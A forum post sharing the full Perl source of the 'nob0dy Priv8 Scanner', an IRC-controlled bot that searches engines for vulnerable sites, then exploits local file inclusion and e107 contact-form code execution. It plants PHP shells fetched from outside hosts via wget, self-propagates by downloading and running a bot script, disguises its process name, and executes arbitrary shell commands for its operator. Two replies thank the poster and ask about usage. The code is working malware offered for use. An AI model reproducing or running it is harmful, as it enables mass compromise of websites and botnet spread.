Guest vini4p Posted December 29, 2010 Report Posted December 29, 2010 #!/usr/bin/perl# nob0dy Priv8 Scanner SE v1.2# Coded by Vrs-hCk# ander[at]antisecurity.org# Last Edited: Jun 21 2010# How to use:# perl nob0dy.pl irc.server.net 6667 nick ident chan admin /usr/sbin/fakeprocuse HTTP::Request;use LWP::UserAgent;use IO::Socket;use IO::Select;use Socket;use MIME::Base64;my $datetime = localtime;my $fakeproc = $ARGV[6];$ircserver = $ARGV[0] unless $ircserver;my $ircport = $ARGV[1];my $nickname = $ARGV[2];my $ident = $ARGV[3];my $channel = '#'.$ARGV[4];my $admin = $ARGV[5];my $fullname = "( nob0dy )";my $nob0dy = "15(7@2nob0dy15)";my $lfilogo = "15(7@2LFI15)";my $lfdlogo = "15(7@2LFD15)";my $e107logo = "15(7@2e10715)";my $lficmd = '!lfi';my $lfdcmd = '!lfd';my $e107cmd = '!e107';my $injector = "http://opendoor.ie/logs/logs";my $botshell = "http://antrax.us/tools/bot.pl";my $uagent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6';my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";my $lfdoutput = "root:(.+).+).+).+).+).+)";if (@ARGV == 7) { print "\n[+] nob0dy Priv8 Scanner SE\n". "[+] IRC Host : $ircserver\n". "[+] IRC Port : $ircport\n". "[+] Bot Nick : $nickname\n". "[+] Bot Ident : $ident\n". "[+] Channel : $channel\n". "[+] Bot Admin : $admin\n". "[+] Process/PID : $fakeproc - $$\n\n";}else { print "\n[USAGE] perl $0 irc.server.net 6667 nick ident channel admin /usr/sbin/fakeproc\n\n"; exit();}$SIG{'INT'} = 'IGNORE';$SIG{'HUP'} = 'IGNORE';$SIG{'TERM'} = 'IGNORE';$SIG{'CHLD'} = 'IGNORE';$SIG{'PS'} = 'IGNORE';chdir("/");$ircserver = "$ARGV[0]" if $ARGV[0];$0 = "$fakeproc"."\0" x 16;my $pid = fork;exit if $pid;die "\n[!] 
Something Wrong !!!: $!\n\n" unless defined($pid);our %irc_servers;our %DCC;my $dcc_sel = new IO::Select->new();$sel_client = IO::Select->new();sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; }}sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep 1; }}sub parse { my $servarg = shift; if ($servarg =~ /^PING \.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\.+?)\!(.+?)\@(.+?)\s+NICK\s+\\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick = $4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\.+?)\s+433/i) { nick("$mynick".int rand(999)); } elsif ($servarg =~ m/^\.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $mynick +Bx"); sendraw("JOIN $channel"); sleep(1); sendraw("PRIVMSG $channel :Hosted by: Midnightcr3w - Private ScanneR"); sendraw("PRIVMSG $admin :Hi $admin im here !!!"); }}my $line_temp;while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); } delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $ircmsg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; 
delete($irc_servers{$fh}); } @lines = split (/\n/, $ircmsg); $ircmsg =~ s/\r\n$//; if ($ircmsg =~ /^\.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \.+)/) { my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5); if ($path eq $mynick) { if ($msg =~ /^PING (.*)/) { sendraw("NOTICE $nick :PING $1"); } if ($msg =~ /^VERSION/) { sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey"); } if ($msg =~ /^TIME/) { sendraw("NOTICE $nick :TIME ".$datetime.""); } if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) { sendraw("NICK ".$1); } if (&isAdmin($nick) && $msg =~ /^!pid/) { sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$"); } if (&isAdmin($nick) && $msg !~ /^!/) { &shell("$nick","$msg"); } } else { if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg eq "!part") { sendraw("PART $path"); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) { &shell("$path","$1"); } ##################################################################### HELP COMMAND if ($msg=~ /^!help/) { my $helplogo = "15(7@2Help15)"; ¬ice("$nick","$helplogo 12LFI Vuln Scan:6 $lficmd [bug] [dork]"); ¬ice("$nick","$helplogo 12LFD Vuln Scan:6 $lfdcmd [bug] [dork]"); ¬ice("$nick","$helplogo 12e107 Vuln Scan:6 
$e107cmd [bug] [dork]"); } if ($msg=~ /^!response/ || $msg=~ /^!id/) { if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) { ¬ice("$nick","15(7@2Injector15)6 PHP Shell is 3UP"); } else { ¬ice("$nick","15(7@2Injector15)6 PHP Shell is 4Down"); } } if (&isAdmin($nick) && $msg =~ /^!pid/) { ¬ice("$nick","6Fake Process/PID : $fakeproc - $$"); } ##################################################################### LFD SCAN if ($msg=~ /^$lfdcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); &msg("$path","$lfdlogo 12Dork :4 $dork"); &msg("$path","$lfdlogo 12Bugz :4 $bug"); &msg("$path","$lfdlogo 6Search Engine Loading ..."); &lfd_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo"); } exit; } } ##################################################################### LFIRCE SCAN if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) { my ($bug,$dork) = ($1,$2); &msg("$path","$lfilogo 12Dork :4 $dork"); &msg("$path","$lfilogo 12Bugz :4 $bug"); &msg("$path","$lfilogo 6Search Engine Loading ..."); &lfi_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo"); } else { &msg("$path","[ $nick ] $lfilogo 4PHP Shell is Down!"); } } exit; } } ##################################################################### e107 contact.php SCAN if ($msg=~ /^$e107cmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) { my ($bug,$dork) = ($1,$2); &msg("$path","$e107logo 12Dork :4 $dork"); &msg("$path","$e107logo 12Bugz :4 $bug"); &msg("$path","$e107logo 6Search Engine Loading ..."); &e107_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo"); } else { &msg("$path","[ $nick ] $e107logo 4PHP Shell is Down!"); } } exit; } } 
##################################################################### } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line = $line_temp.$line if ($line_temp); $line_temp = ''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } }}#########################################sub lfd_start() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"GooGLe"); } exit; } } if ($engine =~ /alltheweb/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"AllTheWeb"); } exit; } } if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"Bing"); } exit; } } if ($engine =~ /altavista/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"ALtaViSTa"); } exit; } } if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"AsK"); } exit; } } if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"UoL"); } exit; } } if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfd($chan,$bug,$dork,"YahOo"); } exit; } }}sub lfi_start() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"GooGLe"); } exit; } } if ($engine =~ /alltheweb/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"AllTheWeb"); } 
exit; } } if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"Bing"); } exit; } } if ($engine =~ /altavista/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"ALtaViSTa"); } exit; } } if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"AsK"); } exit; } } if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"UoL"); } exit; } } if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,$dork,"YahOo"); } exit; } }}sub e107_start() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"GooGLe"); } exit; } } if ($engine =~ /alltheweb/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"AllTheWeb"); } exit; } } if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"Bing"); } exit; } } if ($engine =~ /altavista/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"ALtaViSTa"); } exit; } } if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"AsK"); } exit; } } if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"UoL"); } exit; } } if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &e107($chan,$bug,$dork,"YahOo"); } exit; } }}#########################################sub lfd() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = 
$_[3]; my $count = 0; my @list = search_engine($chan,$bug,$dork,$engine,$lfdlogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$lfdlogo(7@2$engine15)10 Scan finish for14 $dork"); } my $test = "http://".$site.$bug.$lfdtest; my $vuln = "http://".$site."12".$bug."6".$lfdtest; my $html = get_content($test); if ($html =~ /$lfdoutput/) { &msg("$chan","$lfdlogo(7@2$engine15)15(13@12Vuln15)4 ".$vuln." $nob0dy"); sleep(3); } } }}sub lfi() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = search_engine($chan,$bug,$dork,$engine,$lfilogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$lfilogo(7@2$engine15)10 Scan finish for14 $dork"); } my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../"; my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000"; my $vuln = "http://".$site."12".$bug."6".$dir."7/proc/self/environ%0000"; my $shell = "http://".$site."12".$bug."6".$dir."7/tmp/x-treme%0000"; my $html = get_content($test); if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT=/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $code = 'echo "c0li#".php_uname()."#c0li"; if(@copy("'.$injector.'","/tmp/x-treme")) { echo "SUCCESS"; }'; my $res = lfi_env_query($test,encode_base64($code)); &lfi_spread_query($test); $res =~ s/\n//g; if ($res =~ /c0li#(.*)#c0liSUCCESS/sg) { my $sys = $1; &msg("$chan","$lfilogo(7@2$engine15)15(13@12X-SHell15)4 ".$shell." 15(7@3".$sys."15)$nob0dy"); sleep(4); } elsif ($res =~ /c0li#(.*)#c0li/sg) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $sys = $1; my $upload = 'system("wget '.$injector.' 
-O /tmp/x-treme");'; my $wget = lfi_env_query($test,encode_base64($upload)); sleep(1); my $check = get_content("http://".$site.$bug.$dir."/tmp/x-treme%0000"); sleep(1); if ($check =~ /Hacked by Vrs-hCk/) { &msg("$chan","$lfilogo(7@2$engine15)15(13@12X-SHeLL15)4 ".$shell." 15(7@3".$sys."15)$nob0dy"); sleep(4); } else { &msg("$chan","$lfilogo(7@2$engine15)15(13@12SysTem15)4 ".$vuln." 15(7@3".$sys."15)$nob0dy"); sleep(4); } } exit; } } else { &msg("$chan","$lfilogo(7@2$engine15)15(13@12EnviRon15)4 ".$vuln." $nob0dy"); } } exit; } sleep(3); } } }}sub e107() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = search_engine($chan,$bug,$dork,$engine,$e107logo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$e107logo(7@2$engine15)10 Scan finish for14 $dork"); } my $test = "http://".$site.$bug; my $code = "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"; my $html = e107_rce_query($test,$code); if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $sys = $1; my $upload = 'if(@copy("'.$injector.'","connect.php")) { echo "c0liSUKSESc0li"; }'; my $res = e107_rce_query($test,encode_base64($upload)); if ($res =~ /c0liSUKSESc0li/) { &msg("$chan","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12version.php 15(7@3".$sys."15)(7@12safemode-off15)");&msg("ScanneD","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12version.php 15(7@3".$sys."15)(7@12safemode-off15)"); sleep(5); } else { &msg("$chan","$e107logo(7@2$engine15)15(13@12Vuln15)10 ".$test." 
15(7@3".$sys."15)(7@12safemode-off15)"); sleep(5); } &e107_spread_query($test); sleep(2); } exit; } sleep(5); } elsif ($html =~ /v0pCr3w<br>sys:(.+?)<br>/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $sys = $1; my $upload = 'if(@copy("'.$injector.'","connect.php")) { echo "c0liSUKSESc0li"; }'; my $res = e107_rce_query($test,encode_base64($upload)); if ($res =~ /c0liSUKSESc0li/) { &msg("$chan","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12version.php 15(7@3".$sys."15)(7@4safemode-on15)"); sleep(5); } else { &msg("$chan","$e107logo(7@2$engine15)15(13@12Vuln15)10 ".$test." 15(7@3".$sys."15)(7@4safemode-on15)"); sleep(5); } } exit; } sleep(5); } } }}#########################################sub search_engine() { my (@total,@clean); my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $logo = $_[4]; if ($engine eq "GooGLe") { my @google = google($dork); push(@total,@google); } if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); } if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); } if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); } if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); } if ($engine eq "UoL") { my @uol = uol($dork); push(@total,@uol); } if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); } @clean = clean(@total); &msg("$chan","$logo(7@2$engine15)12 Total:4 (".scalar(@total).")12 Clean:4 (".scalar(@clean).")"); return @clean;}#########################################sub rfi_os() { my $sys = ""; my $url = $_[0]; my $chk = get_content($url); if ($chk =~ /<br>sys:(.+?)<br>/sg) { $sys = $1; } return $sys;}sub rce_os() { my $sys = ""; my $url = $_[0]; my $chk = get_content($url); $chk =~ s/\n//; if ($chk =~ /999(.*)666/sg) { $sys = $1; } return $sys;}sub isFound() { my $status = 0; my $link = $_[0]; my $reqexp = $_[1]; my $res = get_content($link); if ($res 
=~ /$reqexp/) { $status = 1 } return $status;}sub get_content() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(10); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content;}sub lfi_env_query() { my $url = $_[0]; my $code = $_[1]; my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>"); $ua->timeout(10); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content;}sub lfi_spread_query() { my $url = $_[0]; my $botnick = 'x-bot['.(int rand(6666)).']'; my $botchan = $channel; $botchan =~ s/\#//; my $code = "system('rm -rf /tmp/x-bot;wget $botshell -O /tmp/x-bot;perl /tmp/x-bot $ircserver $ircport $botnick xbot $botchan $admin /usr/bin/php');"; my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>"); $ua->timeout(5); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req);}sub e107_rce_query() { my $url = $_[0]; my $code = $_[1]; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'));die;[/php]"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(10); my $res = $ua->request($req); return $res->content;}sub e107_spread_query() { my $url = $_[0]; my $code = "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"; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'));die;[/php]"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(10); my $res = $ua->request($req);}######################################### SEARCH ENGINEsub google() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$i); my $res = search_engine_query($search); 
while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) { my $link = $1; if ($link !~ /google/){ my @grep = links($link); push(@list,@grep); } } } return @list;}sub alltheweb() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100) { my $search = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); my $res = search_engine_query($search); while ($res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g) { my $link = $1; $link =~ s/ //g; my @grep = links($link); push(@list,@grep); } } return @list;}sub uol() { my @list; my $key = $_[0]; for (my $i=1; $i<=1000; $i+=10) { my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$i); my $res = search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) { my $link = $1; if ($link !~ /busca|uol|yahoo/) { my @grep = links($link); push(@list,@grep); } } } return @list;}sub bing() { my @list; my $key = $_[0]; for (my $i=1; $i<=1000; $i+=10) { my $search = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$i."&FORM=PERE"); my $res = search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) { my $link = $1; if ($link !~ /msn|live|bing/) { my @grep = links($link); push(@list,@grep); } } } return @list;}sub altavista() { my @list; my $key = $_[0]; for (my $i=1; $i<=1000; $i+=10){ my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$i); my $res = search_engine_query($search); while ($res =~ m/<span class=ngrn>(.+?)\//g) { my $link = $1; if ($link !~ /altavista/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep); } } } return @list;}sub ask() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=10) { my $search = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$i); my $res = search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) { my $link = 
$1; if ($link !~ /ask\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list;}sub yahoo() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=1) { my $search = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$i); my $res = search_engine_query($search); while ($res =~ m/26u=(.*?)%26w=/g) { my $link = $1; if ($link!~ /yahoo/){ my @grep = links($link); push(@list,@grep); } } } return @list;}#########################################sub clean() { my @cln = (); my %visit = (); foreach my $element (@_) { $element =~ s/\/+/\//g; next if $visit{$element}++; push @cln, $element; } return @cln;}sub key() { my $dork = $_[0]; $dork =~ s/ /\+/g; $dork =~ s/:/\%3A/g; $dork =~ s/\//\%2F/g; $dork =~ s/&/\%26/g; $dork =~ s/\"/\%22/g; $dork =~ s/,/\%2C/g; $dork =~ s/\\/\%5C/g; return $dork;}sub links() { my @list; my $link = $_[0]; my $host = $_[0]; my $hdir = $_[0]; $hdir =~ s/(.*)\/[^\/]*$/\1/; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host .= "/"; $link .= "/"; $hdir .= "/"; $host =~ s/\/\//\//g; $hdir =~ s/\/\//\//g; $link =~ s/\/\//\//g; push(@list,$link,$host,$hdir); return @list;}sub search_engine_query() { my $url = $_[0]; $url =~ s/http:\/\///; my $host = $url; my $query = $url; my $page = ""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; if ($query eq "") { $query = "/"; } eval { my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n"; my @pages = <$sock>; $page = "@pages"; close($sock); }; return $page;}#########################################sub shell() { my $path = $_[0]; my $cmd = $_[1]; if ($cmd =~ /cd (.*)/) { chdir("$1") || &msg("$path","No such file or directory"); return; } elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my @output = `$cmd 2>&1 3>&1`; my $c = 0; foreach my $output (@output) { $c++; 
chop $output; &msg("$path","$output"); if ($c == 5) { $c = 0; sleep 3; } } exit; }}}sub isAdmin() { my $status = 0; my $nick = $_[0]; if ($nick eq $admin) { $status = 1; } return $status;}sub msg() { return unless $#_ == 1; sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");}sub nick() { return unless $#_ == 0; sendraw("NICK $_[0]");}sub notice() { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]");} Quote
sTrEs — Posted December 29, 2010
de cand caut ceva asemanator si bun, multumesc!
go_sword Posted December 31, 2010 Report Posted December 31, 2010 # How to use:# perl nob0dy.pl irc.server.net 6667 nick ident chan admin /usr/sbin/fakeprocpoate asta ? Quote